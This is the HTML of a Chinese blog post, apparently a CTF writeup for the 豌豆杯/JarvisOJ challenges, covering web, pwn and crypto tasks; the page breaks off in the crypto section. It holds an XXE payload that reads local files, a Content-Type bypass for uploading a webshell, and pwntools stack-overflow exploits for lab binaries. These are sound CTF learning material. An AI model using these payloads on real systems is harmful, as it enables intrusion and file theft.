<!DOCTYPE html>
<html style="display: none;" lang="zh">
    <head><meta name="generator" content="Hexo 3.8.0">
    <meta charset="utf-8">
    <!--
        © Material Theme
        https://github.com/viosey/hexo-theme-material
        Version: 1.5.6 -->
    <script>
        window.materialVersion = "1.5.6"
        // Delete localstorage with these tags
        window.oldVersion = [
            'codestartv1',
            '1.3.4',
            '1.4.0',
            '1.4.0b1',
            '1.5.0',
            '1.5.2',
            '1.5.5'
        ]
    </script>

    <!-- dns prefetch -->
    <meta http-equiv="x-dns-prefetch-control" content="on">

    <link rel="dns-prefetch" href="https://cdn.jsdelivr.net/gh/viosey/hexo-theme-material/source/">


    <link rel="dns-prefetch" href="https://cdn1.lncld.net">




    <link rel="dns-prefetch" href="https://cdn1.lncld.net">
    <link rel="dns-prefetch" href="https://cdn.jsdelivr.net">





    <link rel="dns-prefetch" href="https://fonts.googleapis.com">





    <!-- Meta & Info -->
    <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">
    <meta name="renderer" content="webkit">
    <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">

    <!-- Title -->
    
    <title>
        
            豌豆杯Writeup | 
        
        冰刀
    </title>

    <!-- Favicons -->
    <link rel="icon shortcut" type="image/ico" href="/img/favicon.png">
    <link rel="icon" href="/img/favicon.png">

    <meta name="format-detection" content="telephone=no">
    <meta name="description" itemprop="description" content="醉生梦死">
    <meta name="keywords" content=",豌豆杯,writeup,jarvisOJ">
    <meta name="theme-color" content="#0097A7">

    <!-- Disable Fucking Bloody Baidu Tranformation -->
    <meta http-equiv="Cache-Control" content="no-transform">
    <meta http-equiv="Cache-Control" content="no-siteapp">

    <!--[if lte IE 9]>
        <link rel="stylesheet" href="/css/ie-blocker.css">

        
            <script src="/js/ie-blocker.zhCN.js"></script>
        
    <![endif]-->

    <!-- Import lsloader -->
    <script>(function(){window.lsloader={jsRunSequence:[],jsnamemap:{},cssnamemap:{}};lsloader.removeLS=function(a){try{localStorage.removeItem(a)}catch(b){}};lsloader.setLS=function(a,c){try{localStorage.setItem(a,c)}catch(b){}};lsloader.getLS=function(a){var c="";try{c=localStorage.getItem(a)}catch(b){c=""}return c};versionString="/*"+(window.materialVersion||"unknownVersion")+"*/";lsloader.clean=function(){try{var b=[];for(var a=0;a<localStorage.length;a++){b.push(localStorage.key(a))}b.forEach(function(e){var f=lsloader.getLS(e);if(window.oldVersion){var d=window.oldVersion.reduce(function(g,h){return g||f.indexOf("/*"+h+"*/")!==-1},false);if(d){lsloader.removeLS(e)}}})}catch(c){}};lsloader.clean();lsloader.load=function(f,a,b,d){if(typeof b==="boolean"){d=b;b=undefined}d=d||false;b=b||function(){};var e;e=this.getLS(f);if(e&&e.indexOf(versionString)===-1){this.removeLS(f);this.requestResource(f,a,b,d);return}if(e){var c=e.split(versionString)[0];if(c!=a){console.log("reload:"+a);this.removeLS(f);this.requestResource(f,a,b,d);return}e=e.split(versionString)[1];if(d){this.jsRunSequence.push({name:f,code:e});this.runjs(a,f,e)}else{document.getElementById(f).appendChild(document.createTextNode(e));b()}}else{this.requestResource(f,a,b,d)}};lsloader.requestResource=function(b,e,a,c){var d=this;if(c){this.iojs(e,b,function(h,f,g){d.setLS(f,h+versionString+g);d.runjs(h,f,g)})}else{this.iocss(e,b,function(f){document.getElementById(b).appendChild(document.createTextNode(f));d.setLS(b,e+versionString+f)},a)}};lsloader.iojs=function(d,b,g){var a=this;a.jsRunSequence.push({name:b,code:""});try{var f=new XMLHttpRequest();f.open("get",d,true);f.onreadystatechange=function(){if(f.readyState==4){if((f.status>=200&&f.status<300)||f.status==304){if(f.response!=""){g(d,b,f.response);return}}a.jsfallback(d,b)}};f.send(null)}catch(c){a.jsfallback(d,b)}};lsloader.iocss=function(f,c,h,a){var b=this;try{var g=new XMLHttpRequest();g.open("get",f,true);g.onreadystatechange=function(){if(g.readyState==4){if((g.status>=200&&g.status<300)||g.status==304){if(g.response!=""){h(g.response);a();return}}b.cssfallback(f,c,a)}};g.send(null)}catch(d){b.cssfallback(f,c,a)}};lsloader.iofonts=function(f,c,h,a){var b=this;try{var g=new XMLHttpRequest();g.open("get",f,true);g.onreadystatechange=function(){if(g.readyState==4){if((g.status>=200&&g.status<300)||g.status==304){if(g.response!=""){h(g.response);a();return}}b.cssfallback(f,c,a)}};g.send(null)}catch(d){b.cssfallback(f,c,a)}};lsloader.runjs=function(f,c,e){if(!!c&&!!e){for(var b in this.jsRunSequence){if(this.jsRunSequence[b].name==c){this.jsRunSequence[b].code=e}}}if(!!this.jsRunSequence[0]&&!!this.jsRunSequence[0].code&&this.jsRunSequence[0].status!="failed"){var a=document.createElement("script");a.appendChild(document.createTextNode(this.jsRunSequence[0].code));a.type="text/javascript";document.getElementsByTagName("head")[0].appendChild(a);this.jsRunSequence.shift();if(this.jsRunSequence.length>0){this.runjs()}}else{if(!!this.jsRunSequence[0]&&this.jsRunSequence[0].status=="failed"){var d=this;var a=document.createElement("script");a.src=this.jsRunSequence[0].path;a.type="text/javascript";this.jsRunSequence[0].status="loading";a.onload=function(){d.jsRunSequence.shift();if(d.jsRunSequence.length>0){d.runjs()}};document.body.appendChild(a)}}};lsloader.tagLoad=function(b,a){this.jsRunSequence.push({name:a,code:"",path:b,status:"failed"});this.runjs()};lsloader.jsfallback=function(c,b){if(!!this.jsnamemap[b]){return}else{this.jsnamemap[b]=b}for(var a in this.jsRunSequence){if(this.jsRunSequence[a].name==b){this.jsRunSequence[a].code="";this.jsRunSequence[a].status="failed";this.jsRunSequence[a].path=c}}this.runjs()};lsloader.cssfallback=function(e,c,b){if(!!this.cssnamemap[c]){return}else{this.cssnamemap[c]=1}var d=document.createElement("link");d.type="text/css";d.href=e;d.rel="stylesheet";d.onload=d.onerror=b;var a=document.getElementsByTagName("script")[0];a.parentNode.insertBefore(d,a)};lsloader.runInlineScript=function(c,b){var a=document.getElementById(b).innerText;this.jsRunSequence.push({name:c,code:a});this.runjs()}})();</script>

    <!-- Import queue -->
    <script>function Queue(){this.dataStore=[];this.offer=b;this.poll=d;this.execNext=a;this.debug=false;this.startDebug=c;function b(e){if(this.debug){console.log("Offered a Queued Function.")}if(typeof e==="function"){this.dataStore.push(e)}else{console.log("You must offer a function.")}}function d(){if(this.debug){console.log("Polled a Queued Function.")}return this.dataStore.shift()}function a(){var e=this.poll();if(e!==undefined){if(this.debug){console.log("Run a Queued Function.")}e()}}function c(){this.debug=true}}var queue=new Queue();</script>

    <!-- Import CSS -->
    
        <style id="material_css"></style><script>if(typeof window.lsLoadCSSMaxNums === "undefined")window.lsLoadCSSMaxNums = 0;window.lsLoadCSSMaxNums++;lsloader.load("material_css","https://cdn.jsdelivr.net/gh/viosey/hexo-theme-material/source//css/material.min.css",function(){if(typeof window.lsLoadCSSNums === "undefined")window.lsLoadCSSNums = 0;window.lsLoadCSSNums++;if(window.lsLoadCSSNums == window.lsLoadCSSMaxNums)document.documentElement.style.display="";}, false)</script>
        <style id="style_css"></style><script>if(typeof window.lsLoadCSSMaxNums === "undefined")window.lsLoadCSSMaxNums = 0;window.lsLoadCSSMaxNums++;lsloader.load("style_css","https://cdn.jsdelivr.net/gh/viosey/hexo-theme-material/source//css/style.min.css",function(){if(typeof window.lsLoadCSSNums === "undefined")window.lsLoadCSSNums = 0;window.lsLoadCSSNums++;if(window.lsLoadCSSNums == window.lsLoadCSSMaxNums)document.documentElement.style.display="";}, false)</script>

        
            
                <style id="prettify_css"></style><script>if(typeof window.lsLoadCSSMaxNums === "undefined")window.lsLoadCSSMaxNums = 0;window.lsLoadCSSMaxNums++;lsloader.load("prettify_css","https://cdn.jsdelivr.net/gh/viosey/hexo-theme-material/source//css/prettify.min.css",function(){if(typeof window.lsLoadCSSNums === "undefined")window.lsLoadCSSNums = 0;window.lsLoadCSSNums++;if(window.lsLoadCSSNums == window.lsLoadCSSMaxNums)document.documentElement.style.display="";}, false)</script>
                <style id="prettify_theme"></style><script>if(typeof window.lsLoadCSSMaxNums === "undefined")window.lsLoadCSSMaxNums = 0;window.lsLoadCSSMaxNums++;lsloader.load("prettify_theme","https://cdn.jsdelivr.net/gh/viosey/hexo-theme-material/source//css/prettify/atelier-dune-light.min.css",function(){if(typeof window.lsLoadCSSNums === "undefined")window.lsLoadCSSNums = 0;window.lsLoadCSSNums++;if(window.lsLoadCSSNums == window.lsLoadCSSMaxNums)document.documentElement.style.display="";}, false)</script>
            
        

    

    

    <!-- Config CSS -->

<!-- Other Styles -->
<style>
  body, html {
    font-family: Roboto, "Helvetica Neue", Helvetica, "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei", "微软雅黑", Arial, sans-serif;
    overflow-x: hidden !important;
  }
  
  code {
    font-family: Consolas, Monaco, 'Andale Mono', 'Ubuntu Mono', monospace;
  }

  a {
    color: #00838F;
  }

  .mdl-card__media,
  #search-label,
  #search-form-label:after,
  #scheme-Paradox .hot_tags-count,
  #scheme-Paradox .sidebar_archives-count,
  #scheme-Paradox .sidebar-colored .sidebar-header,
  #scheme-Paradox .sidebar-colored .sidebar-badge{
    background-color: #0097A7 !important;
  }

  /* Sidebar User Drop Down Menu Text Color */
  #scheme-Paradox .sidebar-colored .sidebar-nav>.dropdown>.dropdown-menu>li>a:hover,
  #scheme-Paradox .sidebar-colored .sidebar-nav>.dropdown>.dropdown-menu>li>a:focus {
    color: #0097A7 !important;
  }

  #post_entry-right-info,
  .sidebar-colored .sidebar-nav li:hover > a,
  .sidebar-colored .sidebar-nav li:hover > a i,
  .sidebar-colored .sidebar-nav li > a:hover,
  .sidebar-colored .sidebar-nav li > a:hover i,
  .sidebar-colored .sidebar-nav li > a:focus i,
  .sidebar-colored .sidebar-nav > .open > a,
  .sidebar-colored .sidebar-nav > .open > a:hover,
  .sidebar-colored .sidebar-nav > .open > a:focus,
  #ds-reset #ds-ctx .ds-ctx-entry .ds-ctx-head a {
    color: #0097A7 !important;
  }

  .toTop {
    background: #757575 !important;
  }

  .material-layout .material-post>.material-nav,
  .material-layout .material-index>.material-nav,
  .material-nav a {
    color: #757575;
  }

  #scheme-Paradox .MD-burger-layer {
    background-color: #757575;
  }

  #scheme-Paradox #post-toc-trigger-btn {
    color: #757575;
  }

  .post-toc a:hover {
    color: #00838F;
    text-decoration: underline;
  }

</style>


<!-- Theme Background Related-->

    <style>
      body{
        background-color: #87CEEB;
      }

      /* blog_info bottom background */
      #scheme-Paradox .material-layout .something-else .mdl-card__supporting-text{
        background-color: #fff;
      }
    </style>




<!-- Fade Effect -->

    <style>
      .fade {
        transition: all 800ms linear;
        -webkit-transform: translate3d(0,0,0);
        -moz-transform: translate3d(0,0,0);
        -ms-transform: translate3d(0,0,0);
        -o-transform: translate3d(0,0,0);
        transform: translate3d(0,0,0);
        opacity: 1;
      }

      .fade.out{
        opacity: 0;
      }
    </style>


<!-- Import Font -->
<!-- Import Roboto -->

    <link href="https://fonts.googleapis.com/css?family=Roboto:300,400,500" rel="stylesheet">


<!-- Import Material Icons -->


    <style id="material_icons"></style><script>if(typeof window.lsLoadCSSMaxNums === "undefined")window.lsLoadCSSMaxNums = 0;window.lsLoadCSSMaxNums++;lsloader.load("material_icons","https://cdn.jsdelivr.net/gh/viosey/hexo-theme-material/source//css/material-icons.css",function(){if(typeof window.lsLoadCSSNums === "undefined")window.lsLoadCSSNums = 0;window.lsLoadCSSNums++;if(window.lsLoadCSSNums == window.lsLoadCSSMaxNums)document.documentElement.style.display="";}, false)</script>




    <!-- Import jQuery -->
    
        <script>lsloader.load("jq_js","https://cdn.jsdelivr.net/gh/viosey/hexo-theme-material/source//js/jquery.min.js", true)</script>
    

    <!-- WebAPP Icons -->
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="application-name" content="冰刀">
    <meta name="msapplication-starturl" content="https://iceknife.top/2018/10/29/豌豆杯Writeup/">
    <meta name="msapplication-navbutton-color" content="#0097A7">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-title" content="冰刀">
    <meta name="apple-mobile-web-app-status-bar-style" content="black">
    <link rel="apple-touch-icon" href="/img/favicon.png">

    <!-- Site Verification -->
    <meta name="google-site-verification" content="idxxoPBhtbdaJiAH_yeMleYt_5dpCoujgG3P-l0_CH8">
    <meta name="baidu-site-verification" content="0zdVrJ9mEl">

    <!-- RSS -->
    

    <!-- The Open Graph protocol -->
    <meta property="og:url" content="https://iceknife.top/2018/10/29/豌豆杯Writeup/">
    <meta property="og:type" content="blog">
    <meta property="og:title" content="豌豆杯Writeup | 冰刀">
    <meta property="og:image" content="/img/favicon.png">
    <meta property="og:description" content="醉生梦死">
    <meta property="og:article:tag" content="豌豆杯"> <meta property="og:article:tag" content="writeup"> <meta property="og:article:tag" content="jarvisOJ"> 

    
        <meta property="article:published_time" content="Mon Oct 29 2018 01:00:06 GMT+0800">
        <meta property="article:modified_time" content="Mon Oct 29 2018 12:42:54 GMT+0800">
    

    <!-- The Twitter Card protocol -->
    <meta name="twitter:card" content="summary_large_image">

    <!-- Add canonical link for SEO -->
    
        <link rel="canonical" href="https://iceknife.top/2018/10/29/豌豆杯Writeup/index.html">
    

    <!-- Structured-data for SEO -->
    
        


<script type="application/ld+json">
{
    "@context": "https://schema.org",
    "@type": "BlogPosting",
    "mainEntityOfPage": "https://iceknife.top/2018/10/29/豌豆杯Writeup/index.html",
    "headline": "豌豆杯Writeup",
    "datePublished": "Mon Oct 29 2018 01:00:06 GMT+0800",
    "dateModified": "Mon Oct 29 2018 12:42:54 GMT+0800",
    "author": {
        "@type": "Person",
        "name": "IceKnife",
        "image": {
            "@type": "ImageObject",
            "url": "/img/Persona.png"
        },
        "description": "醉生梦死"
    },
    "publisher": {
        "@type": "Organization",
        "name": "冰刀",
        "logo": {
            "@type":"ImageObject",
            "url": "/img/favicon.png"
        }
    },
    "keywords": ",豌豆杯,writeup,jarvisOJ",
    "description": "醉生梦死",
}
</script>


    

    <!-- Analytics -->
    
    
    

    <!-- Custom Head -->
    

</head>


    
        <body id="scheme-Paradox" class="lazy">
            <div class="material-layout  mdl-js-layout has-drawer is-upgraded">
                <script type="text/javascript"
                color="139,0,0" opacity='0.7' zIndex="-2" count="99" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>
                

                <!-- Main Container -->
                <main class="material-layout__content" id="main">

                    <!-- Top Anchor -->
                    <div id="top"></div>

                    
                        <!-- Hamburger Button -->
                        <button class="MD-burger-icon sidebar-toggle">
                            <span id="MD-burger-id" class="MD-burger-layer"></span>
                        </button>
                    

                    <!-- Post TOC -->

    
    <!-- Back Button -->
    <!--
    <div class="material-back" id="backhome-div" tabindex="0">
        <a class="mdl-button mdl-js-button mdl-js-ripple-effect mdl-button--icon"
           href="#" onclick="window.history.back();return false;"
           target="_self"
           role="button"
           data-upgraded=",MaterialButton,MaterialRipple">
            <i class="material-icons" role="presentation">arrow_back</i>
            <span class="mdl-button__ripple-container">
                <span class="mdl-ripple"></span>
            </span>
        </a>
    </div>
    -->


    <!-- Left aligned menu below button -->
    
    
    <button id="post-toc-trigger-btn" class="mdl-button mdl-js-button mdl-button--icon">
        <i class="material-icons">format_list_numbered</i>
    </button>

    <ul class="post-toc-wrap mdl-menu mdl-menu--bottom-left mdl-js-menu mdl-js-ripple-effect" for="post-toc-trigger-btn" style="max-height:80vh; overflow-y:scroll;">
        <ol class="post-toc"><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#豌豆杯Writeup"><span class="post-toc-number">1.</span> <span class="post-toc-text">豌豆杯Writeup</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#WEB"><span class="post-toc-number">1.1.</span> <span class="post-toc-text">WEB</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#web签到题"><span class="post-toc-number">1.1.1.</span> <span class="post-toc-text">web签到题</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#输入密码查看flag"><span class="post-toc-number">1.1.2.</span> <span class="post-toc-text">输入密码查看flag</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#这真能传马？"><span class="post-toc-number">1.1.3.</span> <span class="post-toc-text">这真能传马？</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#这真能注入？"><span class="post-toc-number">1.1.4.</span> <span class="post-toc-text">这真能注入？</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#怎么拿webshell"><span class="post-toc-number">1.1.5.</span> <span class="post-toc-text">怎么拿webshell</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#API"><span class="post-toc-number">1.1.6.</span> <span class="post-toc-text">API</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#Atom"><span class="post-toc-number">1.1.7.</span> <span class="post-toc-text">Atom</span></a></li></ol></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#PWN"><span class="post-toc-number">1.2.</span> <span class="post-toc-text">PWN</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#远程攻击2"><span class="post-toc-number">1.2.1.</span> <span class="post-toc-text">远程攻击2</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#远程攻击3"><span class="post-toc-number">1.2.2.</span> <span class="post-toc-text">远程攻击3</span></a></li></ol></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#Crypto"><span class="post-toc-number">1.3.</span> <span class="post-toc-text">Crypto</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#我这密码忘了。。。"><span class="post-toc-number">1.3.1.</span> <span class="post-toc-text">我这密码忘了。。。</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#二战时期的密码"><span class="post-toc-number">1.3.2.</span> <span class="post-toc-text">二战时期的密码</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#被黑了，求密码"><span class="post-toc-number">1.3.3.</span> <span class="post-toc-text">被黑了，求密码</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#出航了，出航啦！！"><span class="post-toc-number">1.3.4.</span> <span class="post-toc-text">出航了，出航啦！！</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#IDC密码破解"><span class="post-toc-number">1.3.5.</span> <span class="post-toc-text">IDC密码破解</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#超级密码"><span class="post-toc-number">1.3.6.</span> <span class="post-toc-text">超级密码</span></a></li></ol></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#网络协议分析"><span class="post-toc-number">1.4.</span> <span class="post-toc-text">网络协议分析</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#我是没有感情的thief"><span class="post-toc-number">1.4.1.</span> <span class="post-toc-text">我是没有感情的thief</span></a></li></ol></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#MISC"><span class="post-toc-number">1.5.</span> <span class="post-toc-text">MISC</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#会飞的狗狗"><span class="post-toc-number">1.5.1.</span> <span class="post-toc-text">会飞的狗狗</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#文件类型分析"><span class="post-toc-number">1.5.2.</span> <span class="post-toc-text">文件类型分析</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#真真假假分不清楚"><span class="post-toc-number">1.5.3.</span> <span class="post-toc-text">真真假假分不清楚</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#诱人的音乐"><span class="post-toc-number">1.5.4.</span> <span class="post-toc-text">诱人的音乐</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#神秘的文件名"><span class="post-toc-number">1.5.5.</span> <span class="post-toc-text">神秘的文件名</span></a></li></ol></li></ol></li></ol>
    </ul>
    




<!-- Layouts -->

    <!-- Post Module -->
    <div class="material-post_container">

        <div class="material-post mdl-grid">
            <div class="mdl-card mdl-shadow--4dp mdl-cell mdl-cell--12-col">

                <!-- Post Header(Thumbnail & Title) -->
                
    <!-- Paradox Post Header -->
    
        
            <!-- Random Thumbnail -->
            <div class="post_thumbnail-random mdl-card__media mdl-color-text--grey-50">
            <script type="text/ls-javascript" id="post-thumbnail-script">
    var randomNum = Math.floor(Math.random() * 19 + 1);

    $('.post_thumbnail-random').attr('data-original', '/img/random/material-' + randomNum + '.png');
    $('.post_thumbnail-random').addClass('lazy');
</script>

        
    
            <p class="article-headline-p">
                豌豆杯Writeup
            </p>
        </div>





                
                    <!-- Paradox Post Info -->
                    <div class="mdl-color-text--grey-700 mdl-card__supporting-text meta">

    <!-- Author Avatar -->
    <div id="author-avatar">
        <img src="/img/Persona.png" width="44px" height="44px" alt="Author Avatar">
    </div>
    <!-- Author Name & Date -->
    <div>
        <strong>IceKnife</strong>
        <span>10月 29, 2018</span>
    </div>

    <div class="section-spacer"></div>

    <!-- Favorite -->
    <!--
        <button id="article-functions-like-button" class="mdl-button mdl-js-button mdl-js-ripple-effect mdl-button--icon btn-like">
            <i class="material-icons" role="presentation">favorite</i>
            <span class="visuallyhidden">favorites</span>
        </button>
    -->

    <!-- Qrcode -->
    

    <!-- Tags (bookmark) -->
    
    <button id="article-functions-viewtags-button" class="mdl-button mdl-js-button mdl-js-ripple-effect mdl-button--icon">
        <i class="material-icons" role="presentation">bookmark</i>
        <span class="visuallyhidden">bookmark</span>
    </button>
    <ul class="mdl-menu mdl-menu--bottom-right mdl-js-menu mdl-js-ripple-effect" for="article-functions-viewtags-button">
        <li class="mdl-menu__item">
        <a class="post_tag-link" href="/tags/jarvisOJ/">jarvisOJ</a></li><li class="mdl-menu__item"><a class="post_tag-link" href="/tags/writeup/">writeup</a></li><li class="mdl-menu__item"><a class="post_tag-link" href="/tags/豌豆杯/">豌豆杯</a>
    </li></ul>
    

    <!-- Share -->
    
        <button id="article-fuctions-share-button" class="mdl-button mdl-js-button mdl-js-ripple-effect mdl-button--icon">
    <i class="material-icons" role="presentation">share</i>
    <span class="visuallyhidden">share</span>
</button>
<ul class="mdl-menu mdl-menu--bottom-right mdl-js-menu mdl-js-ripple-effect" for="article-fuctions-share-button">
    
    <!-- Leancloud Views -->
        <a class="post_share-link" href="#">
            <li class="mdl-menu__item">
                <span id="/2018/10/29/豌豆杯Writeup/" class="leancloud-views_num" data-flag-title="豌豆杯Writeup">
     &nbsp;浏览量
</span>

            </li>
        </a>
    

    

    <!-- Share Weibo -->
    
        <a class="post_share-link" href="http://service.weibo.com/share/share.php?appkey=&title=豌豆杯Writeup&url=https://iceknife.top/2018/10/29/豌豆杯Writeup/index.html&pic=https://iceknife.top/img/favicon.png&searchPic=false&style=simple" target="_blank">
            <li class="mdl-menu__item">
                分享到微博
            </li>
        </a>
    

    <!-- Share Twitter -->
    
        <a class="post_share-link" href="https://twitter.com/intent/tweet?text=豌豆杯Writeup&url=https://iceknife.top/2018/10/29/豌豆杯Writeup/index.html&via=IceKnife" target="_blank">
            <li class="mdl-menu__item">
                分享到 Twitter
            </li>
        </a>
    

    <!-- Share Facebook -->
    
        <a class="post_share-link" href="https://www.facebook.com/sharer/sharer.php?u=https://iceknife.top/2018/10/29/豌豆杯Writeup/index.html" target="_blank">
            <li class="mdl-menu__item">
                分享到 Facebook
            </li>
        </a>
    

    <!-- Share Google+ -->
    
        <a class="post_share-link" href="https://plus.google.com/share?url=https://iceknife.top/2018/10/29/豌豆杯Writeup/index.html" target="_blank">
            <li class="mdl-menu__item">
                分享到 Google+
            </li>
        </a>
    

    <!-- Share LinkedIn -->
    

    <!-- Share QQ -->
    
        <a class="post_share-link" href="http://connect.qq.com/widget/shareqq/index.html?site=冰刀&title=豌豆杯Writeup&summary=醉生梦死&pics=https://iceknife.top/img/favicon.png&url=https://iceknife.top/2018/10/29/豌豆杯Writeup/index.html" target="_blank">
            <li class="mdl-menu__item">
                分享到 QQ
            </li>
        </a>
    

    <!-- Share Telegram -->
    
</ul>

    
</div>

                

                <!-- Post Content -->
                <div id="post-content" class="mdl-color-text--grey-700 mdl-card__supporting-text fade out">
    
        <h1 id="豌豆杯Writeup"><a href="#豌豆杯Writeup" class="headerlink" title="豌豆杯Writeup"></a>豌豆杯Writeup</h1><h2 id="WEB"><a href="#WEB" class="headerlink" title="WEB"></a>WEB</h2><h3 id="web签到题"><a href="#web签到题" class="headerlink" title="web签到题"></a>web签到题</h3><p>做过类似的题目。。只不过图片换成了滑稽<br>直接查看源码Ctrl+F查询<strong>“flag”</strong>即可找到flag</p>
<p><img src="/2018/10/29/豌豆杯Writeup/滑稽.jpg" alt="某类似的Web滑稽"></p>
<h3 id="输入密码查看flag"><a href="#输入密码查看flag" class="headerlink" title="输入密码查看flag"></a>输入密码查看flag</h3><p>题目说明密码为五位数，那么打开BurpSuite直接爆破就可得flag</p>
<h3 id="这真能传马？"><a href="#这真能传马？" class="headerlink" title="这真能传马？"></a>这真能传马？</h3><p>在上传木马时抓包，更改<code>Content-Type</code>为<code>image/jpeg</code>即可。</p>
<h3 id="这真能注入？"><a href="#这真能注入？" class="headerlink" title="这真能注入？"></a>这真能注入？</h3><p>放入sqlmap跑一跑即可</p>
<h3 id="怎么拿webshell"><a href="#怎么拿webshell" class="headerlink" title="怎么拿webshell"></a>怎么拿webshell</h3><p>扫描后台发现存在hack.php<br>再进行爆破得到密码位1qaz2wsx</p>
<h3 id="API"><a href="#API" class="headerlink" title="API"></a>API</h3><p>看到页面先进行抓包，发现传输了json数据。<br>这题目用到的是XXE漏洞，我们更改<code>Content-Type</code>为<code>application/xml</code><br>然后POST的数据改为</p>
<pre><code>&lt;?xml version=&quot;1.0&quot;?&gt;
&lt;!DOCTYPE abcd[
&lt;!ENTITY any SYSTEM &quot;file://xxx&quot;&gt;]&gt;
&lt;something&gt;&amp;any;&lt;/something&gt;
</code></pre><p>xxx的位置写入flag.txt的地址即可读取flag</p>
<h3 id="Atom"><a href="#Atom" class="headerlink" title="Atom"></a>Atom</h3><p>用题目给的账户密码登录上去后发现环境十分干净，但抓了个包后发现Cookie中有个admin=0。且更改admin=1就会自动跳转到后台。。。这边有个坑，在admin页显眼的位置就有FLAG{xxxxx}，但怎么提交就是不对，还以为环境被破坏了。。。之后偶然观察admin页的源码发现flag藏在注释里。。。</p>
<h2 id="PWN"><a href="#PWN" class="headerlink" title="PWN"></a>PWN</h2><h3 id="远程攻击2"><a href="#远程攻击2" class="headerlink" title="远程攻击2"></a>远程攻击2</h3><p>依旧先<code>checksec</code>看一下</p>
<pre><code>gdb-peda$ checksec
CANARY    : disabled
FORTIFY   : disabled
NX        : ENABLED
PIE       : disabled
RELRO     : Partial
</code></pre><p>然后放到ida里跑一下，发现就是简单的栈溢出，通过scanf写入，覆盖掉返回的地址到<code>read_flag</code>这个函数即可，观察得输入的起始地址为<em>0xffffd140</em>而ret的地址为<em>0xffffd18c</em>，那么写入76个a后加上<code>read_flag</code>的地址即可。完整payload如下：</p>
<pre><code class="Python">from pwn import *

# p = process(&quot;./100&quot;)

payload = &#39;a&#39;*76 + p32(0x8048471)
p.sendline(payload)
p.interactive()
</code></pre>
<h3 id="远程攻击3"><a href="#远程攻击3" class="headerlink" title="远程攻击3"></a>远程攻击3</h3><p>还是一样<code>checksec</code></p>
<pre><code>gdb-peda$ checksec
CANARY    : disabled
FORTIFY   : disabled
NX        : ENABLED
PIE       : disabled
RELRO     : Partial
</code></pre><p>放进ida观察，main函数调用了mem_test函数，而mem_test中scanf存在溢出，依旧是覆盖返回值使程序调用我们想要的函数。起始地址为<em>0xffffd135</em>而ret地址为<em>0xffffd14c</em>，构造payload：</p>
<pre><code class="Python">win_func = 0x80485BD
payload = &#39;a&#39;*23 + p32(win_func)
</code></pre>
<p>接着我们要传入<code>cat flag</code>这条命令，而它的地址为<em>0x080487E0</em>完整payload:</p>
<pre><code class="Python">from pwn import *

p = process(&#39;./memory&#39;)
win_func = 0x80485BD
cat_flag = 0x80487E0
payload = &#39;a&#39;*23 + p32(win_func) + p32(cat_flag) + p32(cat_flag)
p.sendline(payload)
p.interactive()
</code></pre>
<h2 id="Crypto"><a href="#Crypto" class="headerlink" title="Crypto"></a>Crypto</h2><h3 id="我这密码忘了。。。"><a href="#我这密码忘了。。。" class="headerlink" title="我这密码忘了。。。"></a>我这密码忘了。。。</h3><p>进行两次base64解密即可<br>flag：<strong>SK88WGLHBWJ1RMTK61D2X4C5CI7FI0TE</strong></p>
<h3 id="二战时期的密码"><a href="#二战时期的密码" class="headerlink" title="二战时期的密码"></a>二战时期的密码</h3><p>二战时德军的密码：<strong>费娜姆密码</strong></p>
<p>先把密钥转化为七位二进制，接着把密钥与密文异或，得到的结果转化为字符串即为flag<br>贴上脚本：</p>
<pre><code class="Python">a = &#39;000000000000000000000000000000000000000000000000000000000001011100000110000100000001010000000001&#39;
b = &#39;010101110100010101001100010000110100111101001101010001010101010001001111010000110100011001000110&#39;
c = &#39;&#39;
for i in range(len(a)):
    c+=str(ord(a[i])^ord(b[i]))
print(c)
</code></pre>
<p>flag：<strong>WELCOMECISRG</strong></p>
<h3 id="被黑了，求密码"><a href="#被黑了，求密码" class="headerlink" title="被黑了，求密码"></a>被黑了，求密码</h3><p>直接摩斯电码解码即得flag<br><a href="http://www.zhongguosou.com/zonghe/moErSiCodeConverter.aspx" target="_blank" rel="noopener">在线摩斯电码</a><br>flag：<strong>JRQ058XMGC1I7PB4UNGA7BLNBCMS6YJ0</strong></p>
